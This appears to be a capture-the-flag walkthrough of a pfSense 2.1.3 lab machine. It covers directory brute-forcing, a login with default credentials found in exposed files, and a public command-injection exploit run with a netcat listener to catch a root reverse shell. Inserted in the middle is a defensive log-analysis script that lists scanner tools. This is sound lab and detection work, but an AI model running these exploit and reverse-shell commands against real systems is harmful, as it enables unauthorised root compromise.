I’ll preface this post by saying that this machine was unusually easy; I don’t think I completed it the way the author intended. But I’ll post my walkthrough anyhow.
I started by running Nmap against the machine:
# Nmap 7.91 scan initiated Mon Jan 18 13:16:52 2021 as: nmap -p- -oN scan -sC -sV 10.10.10.60
Nmap scan report for 10.10.10.60
Host is up (0.046s latency).
Not shown: 65533 filtered ports
PORT    STATE SERVICE    VERSION
80/tcp  open  http       lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
443/tcp open  ssl/https?
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after:  2023-04-06T19:21:35
|_ssl-date: TLS randomness does not represent time

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 18 13:21:34 2021 -- 1 IP address (1 host up) scanned in 282.03 seconds
From the output you can see there are two open ports: 80 and 443. Port 80, however, simply redirects to 443.
I browsed to port 443 and was greeted with a pfSense login page:
I tried the default pfSense credentials, admin:pfsense, but they were unsuccessful. I then ran Gobuster against the machine to try and find some hidden directories and files:
┌──(root💀kali)-[/usr/share/webshells/asp]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url https://10.10.10.60 -x htm,html,txt,php -k
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://10.10.10.60
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     htm,html,txt,php
[+] Timeout:        10s
===============================================================
2021/01/20 12:53:29 Starting gobuster
===============================================================
/index.html (Status: 200)
/index.php (Status: 200)
/help.php (Status: 200)
/themes (Status: 301)
/stats.php (Status: 200)
/css (Status: 301)
/edit.php (Status: 200)
/includes (Status: 301)
/license.php (Status: 200)
/system.php (Status: 200)
/status.php (Status: 200)
/javascript (Status: 301)
/changelog.txt (Status: 200)
/classes (Status: 301)
/exec.php (Status: 200)
/widgets (Status: 301)
/graph.php (Status: 200)
/tree (Status: 301)
/wizard.php (Status: 200)
/shortcuts (Status: 301)
/pkg.php (Status: 200)
/installer (Status: 301)
/wizards (Status: 301)
/xmlrpc.php (Status: 200)
/reboot.php (Status: 200)
/interfaces.php (Status: 200)
/csrf (Status: 301)
/system-users.txt (Status: 200)
/filebrowser (Status: 301)
/%7Echeckout%7E (Status: 403)
===============================================================
2021/01/20 13:52:12 Finished
===============================================================
A number of directories and files were found. The two that stuck out to me were system-users.txt and changelog.txt. changelog.txt contained the following:
# Security Changelog

### Issue
There was a failure in updating the firewall. Manual patching is therefore required

### Mitigated
2 of 3 vulnerabilities have been patched.

### Timeline
The remaining patches will be installed during the next maintenance window
And system-users.txt contained:
####Support ticket###
Please create the following user
username: Rohit
password: company defaults
Based on this information, I tried to log in to pfSense again using the username rohit and the pfSense default password, pfsense. This was successful and I was able to log in.
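Two things in the Gobuster run and the two text files above are worth catching on the defender's side: the brute-force itself (a burst of 404 responses from one client in a short window, often with a tool name in the User-Agent) and successful requests for plain-text files that have no business sitting in a firewall's web root. The script below is an added example, not part of the original post and not pfSense or lighttpd code. It assumes combined-log-style access log lines (lighttpd's default accesslog.format is close to this but also inserts the virtual host after the client address, so the regex would need adjusting for a real deployment); the sample log lines are constructed for this example, reusing the addresses from the walkthrough.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Combined-log-style line: client, ident, user, [timestamp], "request", status, size,
# "referer", "user-agent". Assumed format for this example; adapt to accesslog.format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "[^"]*" "(?P<ua>[^"]*)"$'
)

# Files that the walkthrough shows being served with HTTP 200 and that should
# never be reachable on an appliance's web root (credential notes, patch state).
SENSITIVE_PATHS = {"/system-users.txt", "/changelog.txt"}

# Substrings that common directory brute-force tools put in their User-Agent.
SCANNER_UA_MARKERS = ("gobuster", "dirbuster", "dirb", "ffuf", "feroxbuster")


def parse_line(line):
    """Return a dict for one access log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def analyse(lines, window=timedelta(seconds=60), miss_threshold=20):
    """Scan log lines and return three kinds of findings:
    - bruteforce: IPs with >= miss_threshold 404s inside a sliding window
    - scanner_ua: IPs whose User-Agent names a known brute-force tool
    - sensitive: (ip, path) pairs where a sensitive file was served with 200
    """
    findings = {"bruteforce": set(), "scanner_ua": set(), "sensitive": []}
    misses = defaultdict(list)  # ip -> timestamps of recent 404 responses
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip = rec["ip"]
        if any(marker in rec["ua"].lower() for marker in SCANNER_UA_MARKERS):
            findings["scanner_ua"].add(ip)
        if rec["status"] == 404:
            stamps = misses[ip]
            stamps.append(rec["ts"])
            # Evict 404s that have fallen out of the sliding window.
            while stamps and rec["ts"] - stamps[0] > window:
                stamps.pop(0)
            if len(stamps) >= miss_threshold:
                findings["bruteforce"].add(ip)
        if rec["path"] in SENSITIVE_PATHS and rec["status"] == 200:
            findings["sensitive"].append((ip, rec["path"]))
    return findings


def constructed_sample_log():
    """Constructed log lines (not a real capture): a wordlist burst from
    10.10.14.14, two sensitive files fetched afterwards, and one benign client."""
    fmt = "%d/%b/%Y:%H:%M:%S %z"
    base = datetime(2021, 1, 20, 12, 53, 29, tzinfo=timezone.utc)
    lines = []
    for i in range(25):
        ts = (base + timedelta(seconds=i)).strftime(fmt)
        lines.append(f'10.10.14.14 - - [{ts}] "GET /guess{i:04d}.php HTTP/1.1" '
                     f'404 345 "-" "gobuster/3.0.1"')
    ts = (base + timedelta(seconds=40)).strftime(fmt)
    lines.append(f'192.168.1.5 - - [{ts}] "GET /index.php HTTP/1.1" 200 9876 "-" '
                 f'"Mozilla/5.0 (X11; Linux x86_64) Firefox/84.0"')
    for j, path in enumerate(sorted(SENSITIVE_PATHS)):
        ts = (base + timedelta(seconds=60 + j)).strftime(fmt)
        lines.append(f'10.10.14.14 - - [{ts}] "GET {path} HTTP/1.1" 200 120 "-" '
                     f'"Mozilla/5.0 (X11; Linux x86_64) Firefox/84.0"')
    return lines


if __name__ == "__main__":
    for kind, value in analyse(constructed_sample_log()).items():
        print(f"{kind}: {value}")
```

The 404 burst and the User-Agent check are independent signals on purpose: a scanner that spoofs a browser User-Agent still trips the 404 threshold, and a slow scan that stays under the threshold is still caught if it keeps the tool's default User-Agent. The sensitive-path rule is the simplest of the three and the one that would have flagged the two files this box was solved with.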
From the dashboard we can see that pfSense version 2.1.3 is running. I googled for exploits affecting this version of pfSense and found a public one (the script run as 43560 below). I downloaded the Python exploit and looked through the code. It creates a reverse shell back to the machine specified in the lhost and lport arguments. I started a netcat listener on port 2600:
┌──(root💀kali)-[/usr/share/wordlists/SecLists/Passwords]
└─# nc -nvlp 2600
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::2600
Ncat: Listening on 0.0.0.0:2600
I then ran the exploit against the Sense machine:
┌──(root💀kali)-[/home/kali/Documents/sense]
└─# python3 43560 --rhost 10.10.10.60 --lhost 10.10.14.14 --lport 2600 --username rohit --password pfsense
CSRF token obtained
Running exploit...
Exploit completed
The exploit reported that it had completed. I then checked the netcat listener and saw that it had successfully caught the reverse shell:
┌──(root💀kali)-[/usr/share/wordlists/SecLists/Passwords]
└─# nc -nvlp 2600
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::2600
Ncat: Listening on 0.0.0.0:2600
Ncat: Connection from 10.10.10.60.
Ncat: Connection from 10.10.10.60:12846.
sh: can't access tty; job control turned off
# whoami
root
# cd /
# cd /home
# ls
.snap
rohit
# cd rohit
# ls
.tcshrc
user.txt
# cat user.txt
[REDACTED]
# cd ..
# cd root
# ls
.cshrc
.first_time
.gitsync_merge.sample
.hushlogin
.login
.part_mount
.profile
.shrc
.tcshrc
root.txt
# cat root.txt
[REDACTED]
As you can see from the output, the reverse shell runs as root (the pfSense web server runs with root privileges, so the command injection lands straight in a root shell). From this shell I was able to capture both the user and root flags.